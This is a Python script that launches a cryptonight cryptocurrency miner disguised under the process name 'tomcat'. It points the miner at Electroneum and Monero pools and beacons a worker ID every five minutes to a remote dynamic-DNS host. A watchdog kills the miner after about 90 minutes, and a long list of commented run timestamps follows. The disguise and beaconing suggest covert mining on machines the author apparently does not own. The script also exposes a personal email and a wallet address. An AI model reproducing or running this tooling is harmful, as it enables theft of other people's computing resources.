import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:39:04.309514
#2018-02-17 16:24:05.651058
#2018-02-17 18:11:07.027331
#2018-02-17 19:59:01.660196
#2018-02-17 21:47:05.389353
#2018-02-17 23:32:03.683813
#2018-02-18 01:21:05.241839
#2018-02-18 03:08:05.399843
#2018-02-18 04:55:06.930114
#2018-02-18 06:46:01.492810
#2018-02-18 08:34:05.507061
#2018-02-18 10:22:02.028177
#2018-02-18 12:07:07.307403
#2018-02-18 13:52:07.100498
#2018-02-18 15:42:02.091217
#2018-02-18 17:32:06.062832
#2018-02-18 19:21:04.032634
#2018-02-18 21:06:06.027779
#2018-02-18 22:53:05.280955
#2018-02-19 00:41:04.584679
#2018-02-19 02:27:06.275040
#2018-02-19 04:14:07.493653
#2018-02-19 05:58:06.147412
#2018-02-19 07:48:07.015381
#2018-02-19 09:38:01.384819
#2018-02-19 11:27:01.716693
#2018-02-19 13:14:01.782624
#2018-02-19 15:02:07.560473
#2018-02-19 16:51:08.122357
#2018-02-19 18:37:07.246452
#2018-02-19 20:24:04.080502
#2018-02-19 22:13:06.753018
#2018-02-19 23:59:05.439954
#2018-02-20 01:46:08.078294
#2018-02-20 03:36:04.967429
#2018-02-20 05:22:06.233094
#2018-02-20 07:06:03.783729
#2018-02-20 08:52:06.811610
#2018-02-20 10:36:01.722302
#2018-02-20 12:22:07.375058
#2018-02-20 14:10:07.558065
#2018-02-20 15:54:08.970604
#2018-02-20 17:41:09.573733
#2018-02-20 19:31:04.482251
#2018-02-20 21:19:06.573055
#2018-02-20 23:04:05.534836
#2018-02-21 00:50:01.523022
#2018-02-21 02:35:08.003889
#2018-02-21 04:23:07.490542
#2018-02-21 06:11:04.246230
#2018-02-21 07:56:05.853843
#2018-02-21 09:42:05.814122
#2018-02-21 11:32:01.878850
#2018-02-21 13:21:01.937459
#2018-02-21 15:05:12.909982
#2018-02-21 16:54:10.363579
#2018-02-21 18:41:01.527212
#2018-02-21 20:26:01.445156
#2018-02-21 22:13:06.769900
#2018-02-22 00:05:02.268187
#2018-02-22 01:54:02.165577
#2018-02-22 03:41:05.181954
#2018-02-22 05:27:06.667692
#2018-02-22 07:14:01.796493
#2018-02-22 09:02:08.758119
#2018-02-22 10:49:07.861607
#2018-02-22 12:35:01.607900
#2018-02-22 14:19:07.556273
#2018-02-22 16:07:04.635914
#2018-02-22 17:53:02.000796
#2018-02-22 19:39:09.121769
#2018-02-22 21:31:07.597538
#2018-02-22 23:18:06.833824
#2018-02-23 01:03:06.240770
#2018-02-23 02:49:06.109369
#2018-02-23 04:42:01.267465
#2018-02-23 06:27:03.724553
#2018-02-23 08:15:07.167506
#2018-02-23 10:33:08.626499
#2018-02-23 12:24:08.042340
#2018-02-23 14:13:08.523043
#2018-02-23 16:05:03.242197
#2018-02-23 17:49:10.335129
#2018-02-23 19:36:05.737888
#2018-02-23 21:18:03.682090
#2018-02-23 23:06:06.849788
#2018-02-24 00:51:04.899688
#2018-02-24 02:35:05.949014
#2018-02-24 04:28:05.488172
#2018-02-24 06:14:01.516205
#2018-02-24 08:02:06.794358
#2018-02-24 09:45:03.242396
#2018-02-24 11:40:01.701278
#2018-02-24 13:31:06.563162
#2018-02-24 15:19:04.999515
#2018-02-24 17:08:07.523052
#2018-02-24 18:59:07.251467
#2018-02-24 20:46:07.229651
#2018-02-24 23:02:05.930087
#2018-02-25 03:12:07.546222
#2018-02-25 06:44:03.166445